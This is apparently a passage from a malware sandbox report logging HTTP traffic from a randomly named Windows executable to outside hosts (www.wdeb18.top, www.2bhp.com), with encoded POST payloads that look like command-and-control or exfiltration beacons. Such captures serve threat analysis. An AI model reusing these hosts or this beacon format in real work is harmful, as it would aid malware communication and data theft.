                                                      Data Ascii: 00yp=pZFR7XUxJ/cK096PfFrpxGZciOwRFhz+prtkcFdoHrepJDIksJlGtbioXYtEAM9pE7Ol/umlRvHwFOyvVxGsXkw7MSfTSLXYuQhnX2dygV3DLt4KSvA5gzmLf0XK6yoGC5vfZCc1paXtWtha8osWhB2Sf63H4l85XHz49Ao2WN2uBPXvQ7kuYbH3nlfoeddO/tH2outBmbZnu4YiLqi07vgxMVeL3ifBsqtnRZc/MkYZu3ziWLu5DKrmL1xtPKJL1hbzJazmtawyXNTqUo6VE2GVpZ8C76r9HpTwbTOop7Nrv1fSIBWBuzdg8THdBtRuI962M+Lf8gsepW0lmTBRF8RjU7F79t9ffwYbLBepUpGg0wS3M/jeQ2gzLUPXiehUFeNglErx/oU53cikgToFAj5j2JlhWWWq7aYR0wDGdlbI74e55xFcD9odlESM92pi4WYgwF8WaWNhp/X/Fo9LceaFrG9AjNaddnbMHkxjFrlvRCjJb/+GfvPAehFlTuWX7BuBS4EdaRy+X5ERVDvn9g7SYNI5RAx1z1+BFHTbW701+K3wGASmr8wrpQ9O8cE2NMxf6hz9MdQFEK0MW/k8dYIL1FvCWHxhi39/+V+qusSs7t9UmkZm0u1jWnkLzI3d4CcRYpSV7yyO1lq0kA43aC1jXX0ZnQ5x6JlPmFc4qehy+ng6Rydx7cKh6J4EApwz8dNtGJfj6sdYgDQ1sCX9xJ9ZLV3ndW7rJXGxT2Tl3r2ThsrdKDQt0XKqzY6MOyOfPjW2enzJU9V8lzAz6HDntqS4rfKb5K9wyBI07RNBYROmI2/9inIFaqOTeZtjyou8hvbx08F4HOpfOTETmpTkEic6MIJdfX29kEEqNC1cILEgUmHutfPravrBGbE88NRWjbjvkcG1Uezic+1smgxb9GhiaGHB4+JSm/15SINYFl+0p/xnIadNYcbZJoaNx9AQfdo0vO8Gh3MTXBaR6zW/WD8ACXxTM7fVYDBNAdxkTXytkaJ [TRUNCATED]
                                                      Sep 19, 2024 15:04:23.914472103 CEST222OUTData Raw: 63 6e 6f 61 37 38 4a 37 65 72 59 48 64 6d 79 71 49 42 38 5a 59 47 43 52 50 66 4d 2f 4d 46 72 56 7a 71 39 33 61 6c 66 47 46 30 6d 4f 71 61 6f 70 30 33 53 38 37 36 35 4a 6d 50 68 57 46 51 50 5a 50 63 41 65 79 66 4c 67 30 32 4f 74 55 6f 41 65 50 6b
                                                      Data Ascii: cnoa78J7erYHdmyqIB8ZYGCRPfM/MFrVzq93alfGF0mOqaop03S8765JmPhWFQPZPcAeyfLg02OtUoAePkut5MY4PT0ipvqbylYRZtKkn51get2CC/UScmPgacBI985rw9YMwtZVba9sOOIj5r8Cg59ZS9rdp94SjF80Zb9Gw9rwSRqRig7a8ImaIPcGc8OpU57BeEXye/gqy9Sj1bTPp+w2dEvfFm
                                                      Sep 19, 2024 15:04:24.863490105 CEST302INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Thu, 19 Sep 2024 13:04:24 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 138
                                                      Connection: close
                                                      ETag: "66aa3fcf-8a"
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.2249164206.119.82.147802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:04:26.469615936 CEST733OUTPOST /66vh/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.wdeb18.top
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 201
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.wdeb18.top
                                                      Referer: http://www.wdeb18.top/66vh/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 70 5a 46 52 37 58 55 78 4a 2f 63 4b 30 2b 53 50 66 51 48 70 77 6d 5a 63 6e 4f 77 52 50 42 7a 34 70 72 6f 5a 63 41 39 34 48 59 2b 70 4a 32 6b 6b 73 37 39 47 75 62 69 72 50 49 74 41 45 4d 38 30 45 37 50 4f 2f 75 61 6c 52 76 6a 77 45 73 36 76 64 54 75 76 4c 45 77 39 41 79 66 4f 53 4c 62 52 75 51 74 33 58 31 64 79 67 58 6a 44 4b 74 6f 4b 58 4a 63 35 6d 44 6d 42 64 30 58 64 36 79 31 4f 43 35 2b 54 5a 44 51 31 70 50 72 74 56 38 42 61 72 72 45 57 34 52 32 70 48 4b 32 75 35 6d 74 50 50 78 76 79 2f 52 63 4a 56 73 36 54 4b 50 4b 6f 64 71 46 67 66 6f 33 6f 34 6a 4f 2b 51 73 77 39 67 67 3d 3d
                                                      Data Ascii: 00yp=pZFR7XUxJ/cK0+SPfQHpwmZcnOwRPBz4proZcA94HY+pJ2kks79GubirPItAEM80E7PO/ualRvjwEs6vdTuvLEw9AyfOSLbRuQt3X1dygXjDKtoKXJc5mDmBd0Xd6y1OC5+TZDQ1pPrtV8BarrEW4R2pHK2u5mtPPxvy/RcJVs6TKPKodqFgfo3o4jO+Qsw9gg==
                                                      Sep 19, 2024 15:04:27.352993965 CEST302INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Thu, 19 Sep 2024 13:04:27 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 138
                                                      Connection: close
                                                      ETag: "66aa3fcf-8a"
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.2249165206.119.82.147802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:04:29.085529089 CEST2472OUTPOST /66vh/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.wdeb18.top
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 3625
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.wdeb18.top
                                                      Referer: http://www.wdeb18.top/66vh/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 70 5a 46 52 37 58 55 78 4a 2f 63 4b 31 61 57 50 63 7a 66 70 32 47 5a 66 2b 2b 77 52 46 68 7a 38 70 72 73 5a 63 46 64 6f 48 71 53 70 4a 46 63 6b 72 5a 6c 47 73 62 69 72 62 34 74 45 41 4d 38 62 45 37 72 34 2f 75 72 53 52 74 50 77 46 4b 6d 76 56 33 4f 73 42 55 77 37 54 69 66 52 53 4c 62 45 75 51 38 38 58 32 78 49 67 58 37 44 4e 65 41 4b 57 35 63 34 36 54 6d 42 64 30 58 52 36 79 30 56 43 35 32 41 5a 48 64 71 70 63 44 74 56 64 68 61 73 49 73 56 2b 52 32 74 4f 71 33 4a 34 6c 77 74 58 48 7a 38 39 41 38 63 57 4e 4b 75 41 64 66 76 51 39 73 76 54 72 48 34 36 56 66 6f 54 39 64 51 2f 74 48 55 6f 75 74 42 6d 62 31 6e 73 6f 59 69 4c 70 36 33 6b 66 67 78 42 31 65 47 71 79 61 79 73 71 49 32 52 5a 73 76 4d 58 30 5a 76 30 4c 69 64 62 75 35 46 36 72 2f 4c 31 77 79 47 71 4a 58 31 67 79 47 4a 62 4f 68 74 61 77 79 58 49 48 71 43 61 69 56 53 57 47 56 72 5a 38 48 31 71 72 38 48 70 57 58 62 51 53 6f 70 36 46 72 39 56 76 53 4b 45 36 43 67 6a 64 6a 74 44 48 62 46 74 52 42 49 39 6e 68 4d 2b 43 43 38 67 63 65 70 [TRUNCATED]
                                                      Data Ascii: 00yp=pZFR7XUxJ/cK1aWPczfp2GZf++wRFhz8prsZcFdoHqSpJFckrZlGsbirb4tEAM8bE7r4/urSRtPwFKmvV3OsBUw7TifRSLbEuQ88X2xIgX7DNeAKW5c46TmBd0XR6y0VC52AZHdqpcDtVdhasIsV+R2tOq3J4lwtXHz89A8cWNKuAdfvQ9svTrH46VfoT9dQ/tHUoutBmb1nsoYiLp63kfgxB1eGqyaysqI2RZsvMX0Zv0Lidbu5F6r/L1wyGqJX1gyGJbOhtawyXIHqCaiVSWGVrZ8H1qr8HpWXbQSop6Fr9VvSKE6CgjdjtDHbFtRBI9nhM+CC8gcepUsllyBRCMRkR7Ewq9xTfwAlLBSfUqSg1hS3L8LfMWgxd0OWo+h2Ff5ClELxqJs52cCk2yoKRj5onZlQf2X97acJ00nWIA3I1oe56TdfPNocskSekmpK4WYewAIgaj5hp7r/LdRLceb3uG9Gosm/dnnIHnU7Fp9vSRLJb++GWvPATBFYZOWr7B6RS6FgaCO+UacRTGDn6A7HeNI0egxCz1OBFCjyW9M1+ofwAjKm+MwnqQ9R8cEANM0N6lfHMfkFEL0MHOk8U4II3FvdSHxCi3Ei+VCMutas7NdUkWxm2O19OnkL4o3/4CUBYrWr73WO2U60ig40Ti1gEX0Wtw5Z6IVPmFQ4qfZy+wM6T1Bx5sKZ1p4gZ5MP8elLGILz6pFYgSQ1rEj+059Tel3hZW7DJXGHT37P3eKThdndIiQq33KTqo6ATiPoPl3ZemGSVOx8lzwz60rntaS4rfKU5K98yBE47UxrYROmKn/9hVgFSKOScZs3kYuchvWa04tSHPFfPBcTmpTrLyclHYJefX7RkEEQNCxcI6QgU1/ut5TrM/rBHbE/2tRVjbi0kZ2bUfzicPVshipYxWhjK2HTyeFJm/wkSMdYGSe0zLFnIqdNHMbGCIbNyNMMfZxpvPsWhFkTW2eR4w+waT8NGXxRM6jcYDJFAYxSTQ+tj6J [TRUNCATED]
                                                      Sep 19, 2024 15:04:29.090600967 CEST1686OUTData Raw: 41 6e 6f 71 37 37 46 72 65 6f 56 6e 64 68 37 4b 4a 41 38 5a 59 34 43 51 53 36 4d 2f 59 46 72 6d 4c 71 37 44 32 6c 66 32 46 32 70 75 71 53 2b 5a 34 6c 53 39 48 6d 35 49 57 31 67 6b 4e 51 41 4c 48 63 56 38 71 66 50 41 31 52 52 64 55 31 41 65 54 41
                                                      Data Ascii: Anoq77FreoVndh7KJA8ZY4CQS6M/YFrmLq7D2lf2F2puqS+Z4lS9Hm5IW1gkNQALHcV8qfPA1RRdU1AeTAutp2Y5fp0QBvrrylOjxsOknj2geg2CDSUSU5PiPHBJl85oI9a8wqJVbc8sOUIj1S8C4T9ZC9rc194zTF0UZbi2wkhQSI1Bun7akS8sVPeC83F5lP6SaabDSghYqieQ1TQs0CjSNxq7saX8sXEmfPZVH1CXnzY+syO
                                                      Sep 19, 2024 15:04:29.962019920 CEST302INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Thu, 19 Sep 2024 13:04:29 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 138
                                                      Connection: close
                                                      ETag: "66aa3fcf-8a"
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.2249166206.119.82.147802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:04:31.621133089 CEST471OUTGET /66vh/?00yp=kbtx4jUoEeJqru/eYT3c5Vhire4uK17S+715NBpuIdmHZ1xIlp9jjMC+TZBsTM0SMZjf/6T4SKfDIcfbQgeQOxE4AwPYeLb9hxh0awV4oFygVNkIao1fnT6jcB2l&8Xv=VLHph HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.wdeb18.top
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Sep 19, 2024 15:04:32.627710104 CEST302INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Thu, 19 Sep 2024 13:04:32 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 138
                                                      Connection: close
                                                      ETag: "66aa3fcf-8a"
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.224916781.88.63.46802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:04:37.707329988 CEST2472OUTPOST /znmp/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.2bhp.com
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 2161
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.2bhp.com
                                                      Referer: http://www.2bhp.com/znmp/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 49 4a 4d 31 44 48 44 55 2b 78 45 34 47 50 69 76 45 72 68 4a 30 69 37 79 36 47 64 57 41 66 35 67 54 44 59 58 69 39 6c 73 70 4e 54 2f 6f 4e 71 75 45 37 42 4c 7a 66 6c 7a 42 36 73 4f 69 4b 66 4c 4a 6e 55 33 68 33 37 57 48 6f 49 30 4f 4b 72 49 4f 59 2f 53 4b 76 6c 70 4f 33 52 4f 4d 55 71 52 76 42 58 47 67 55 59 67 74 32 38 50 65 36 57 6d 63 34 50 65 6b 61 66 32 68 4d 51 52 79 33 63 53 72 66 41 4e 79 4e 45 6a 4e 50 61 77 4a 6b 72 4b 32 74 54 53 78 75 6f 38 6d 61 53 6b 37 6c 67 4d 74 68 55 57 47 4c 57 78 2f 6f 39 6e 4d 44 44 47 61 6c 5a 44 47 30 41 51 53 33 5a 69 59 39 66 57 31 59 48 66 33 56 52 76 62 6c 75 4a 30 73 52 5a 6c 32 4f 48 38 55 46 71 42 6f 4a 53 31 63 4b 6a 62 43 4d 6f 4c 30 34 34 62 54 49 52 46 6e 6a 30 62 45 4c 63 6f 54 62 48 35 46 79 51 65 6a 62 2f 55 6d 2f 69 54 4b 65 6e 69 6a 2f 70 62 4a 77 61 4b 79 59 63 61 71 4f 42 47 55 64 33 73 30 34 4c 32 63 59 51 50 55 51 59 68 4f 50 59 6f 47 6d 6e 49 50 6e 67 35 56 56 79 76 4f 43 53 34 71 77 72 50 55 4f 74 7a 76 45 2b 73 67 63 6a 4e [TRUNCATED]
                                                      Data Ascii: 00yp=IJM1DHDU+xE4GPivErhJ0i7y6GdWAf5gTDYXi9lspNT/oNquE7BLzflzB6sOiKfLJnU3h37WHoI0OKrIOY/SKvlpO3ROMUqRvBXGgUYgt28Pe6Wmc4Pekaf2hMQRy3cSrfANyNEjNPawJkrK2tTSxuo8maSk7lgMthUWGLWx/o9nMDDGalZDG0AQS3ZiY9fW1YHf3VRvbluJ0sRZl2OH8UFqBoJS1cKjbCMoL044bTIRFnj0bELcoTbH5FyQejb/Um/iTKenij/pbJwaKyYcaqOBGUd3s04L2cYQPUQYhOPYoGmnIPng5VVyvOCS4qwrPUOtzvE+sgcjN+vZE8/8GO/oOEhbKw7susAYzuZLtKI6CfIStoAu4xAVvKEE+IffuLnqq4oR1lDSozZa8jw8Atbh2vaKdrvg5jeQKOsTXLj8yIwT0NFXGCMGfGNyvH5vKNAE574VI73a+u1pn4v4cmNaYgFKYVVK716qaU3qx+CucAGjbv3OCNZrNe1Eb+Iax1TnR2aH4K+0eVFimpEcfbPs+MSDnn42POnh8yINKTR42xRXSlNntxLwLI9PD9aYMT1VIrkKIui68SnaRlI57EgabDv9fBMmGDHd6V7iYF9UH0mlzjmZa6Nyy+OUNu332dVEJJlQgL5mPGlY71fO2i610iaDQP7sJGlF2e192eZ0kl6XoLux4N/g37L+C4FvfjbHeA2cvyRoGpYJRZH4DLC4zuHQfoQbo6XbyfObnatTrRAnZLu9mm/9mp8Vk9NBQ9+6dKonwC5AhhrYtITpEM25NOZc6MqpMiPgsyfVwaFXvp1wqVjwvBQhJT8sVMWpY2UPknRDiLz8jS6TIt6wgxp8MDIo9pNuF1KHdJr1ZHVNwJTeQ6fIR9cFXhH60OjdcMUaOSfk10to4ziQQlVW30sCSAjrvLU3oMSTirQru4e0GX547Mxv/ZsOfMT2qsjtv+vJXVYV4uMO1/iUm7p0eD9UKodrst+buslbT5D4LVrK+uL [TRUNCATED]
                                                      Sep 19, 2024 15:04:37.712925911 CEST216OUTData Raw: 72 6c 49 77 33 52 64 56 34 41 33 39 72 43 76 72 50 6b 79 4b 43 67 47 76 62 52 6a 43 76 2f 7a 37 6f 47 47 34 64 33 4f 69 31 2f 55 6e 41 39 38 65 6f 2f 67 2b 45 6a 66 42 55 38 73 32 76 43 4c 6f 35 4f 37 68 48 2f 4a 35 58 74 73 33 41 38 79 68 50 59
                                                      Data Ascii: rlIw3RdV4A39rCvrPkyKCgGvbRjCv/z7oGG4d3Oi1/UnA98eo/g+EjfBU8s2vCLo5O7hH/J5Xts3A8yhPYgkunrPBiYEexw0LlZejCguxoGLoUQ3XUlGPZp/R2acu8GRgAv5UKsjDhJsrdb/fCXgZ6XsaDkB+u+uKvQxEUxoa8YSzdMZ1mMizLQ5NQRtb1F0VsAKq/OyJCPKRxoG9RIxaTfz
                                                      Sep 19, 2024 15:04:38.391731024 CEST367INHTTP/1.1 404 Not Found
                                                      Date: Thu, 19 Sep 2024 13:04:38 GMT
                                                      Server: Apache
                                                      Content-Length: 203
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.224916881.88.63.46802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:04:40.242396116 CEST727OUTPOST /znmp/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.2bhp.com
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 201
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.2bhp.com
                                                      Referer: http://www.2bhp.com/znmp/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 49 4a 4d 31 44 48 44 55 2b 78 45 34 47 4d 4b 76 57 4b 68 4a 32 43 37 79 37 47 64 57 4f 50 35 6d 54 44 56 33 69 39 4e 38 70 36 50 2f 6f 34 57 75 45 4a 5a 4c 67 76 6c 30 4a 61 73 43 39 36 66 53 4a 6e 55 42 68 32 58 57 48 6f 73 30 4f 73 76 49 49 61 62 64 49 66 6c 52 58 6e 52 4c 4d 55 6d 71 76 42 54 57 67 56 41 67 74 30 59 50 66 2b 32 6d 5a 61 58 65 68 71 66 34 78 38 51 67 79 33 52 49 72 66 51 56 79 49 41 6a 4d 2b 57 77 4a 31 4c 4b 78 2b 37 53 37 4f 6f 39 75 36 54 48 78 47 34 43 6b 41 30 4d 47 64 47 56 68 73 35 62 50 53 6a 56 51 6b 74 55 4f 6c 59 42 55 41 41 53 4e 5a 4c 66 76 77 3d 3d
                                                      Data Ascii: 00yp=IJM1DHDU+xE4GMKvWKhJ2C7y7GdWOP5mTDV3i9N8p6P/o4WuEJZLgvl0JasC96fSJnUBh2XWHos0OsvIIabdIflRXnRLMUmqvBTWgVAgt0YPf+2mZaXehqf4x8Qgy3RIrfQVyIAjM+WwJ1LKx+7S7Oo9u6THxG4CkA0MGdGVhs5bPSjVQktUOlYBUAASNZLfvw==
                                                      Sep 19, 2024 15:04:40.889945030 CEST367INHTTP/1.1 404 Not Found
                                                      Date: Thu, 19 Sep 2024 13:04:40 GMT
                                                      Server: Apache
                                                      Content-Length: 203
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.224916981.88.63.46802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:04:42.794575930 CEST2472OUTPOST /znmp/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.2bhp.com
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 3625
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.2bhp.com
                                                      Referer: http://www.2bhp.com/znmp/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 49 4a 4d 31 44 48 44 55 2b 78 45 34 48 73 36 76 55 70 4a 4a 39 43 36 41 69 32 64 57 41 66 35 69 54 44 5a 33 69 39 6c 73 70 4d 76 2f 6f 4c 65 75 45 72 42 4c 69 76 6c 30 64 71 73 4f 69 4b 66 45 4a 6e 41 38 68 33 6e 5a 48 75 4d 30 4f 50 48 49 4f 5a 2f 53 44 50 6c 70 54 6e 52 49 4d 55 6d 7a 76 46 50 53 67 56 45 61 74 31 77 50 66 50 61 6d 52 4b 58 64 75 4b 66 34 78 38 51 57 79 33 52 6f 72 66 49 64 79 4e 67 7a 4e 4d 65 77 49 55 72 4b 30 64 54 56 39 4f 6f 35 74 36 53 71 37 6c 64 38 74 68 55 53 47 50 2b 50 2f 6f 35 6e 4f 56 33 47 61 69 6c 63 4a 45 41 54 63 58 5a 69 48 74 66 55 31 59 48 35 33 56 52 76 62 6c 69 4a 31 38 52 5a 6c 79 61 45 78 30 46 71 4e 49 49 53 6f 73 33 55 62 43 49 4b 4c 31 49 6f 63 69 4d 52 45 6c 4c 30 63 30 4c 63 2f 54 61 4d 35 46 79 6e 56 44 62 6a 55 6d 47 52 54 4f 44 2f 69 6a 2f 70 62 4b 6f 61 50 67 77 63 63 36 4f 42 4a 30 64 32 6d 55 34 49 32 63 74 39 50 58 4d 59 68 50 48 59 70 78 61 6e 4f 4e 50 6a 78 46 56 78 34 65 43 71 75 61 77 2b 50 55 43 32 7a 76 4d 55 73 67 4d 6a 4e [TRUNCATED]
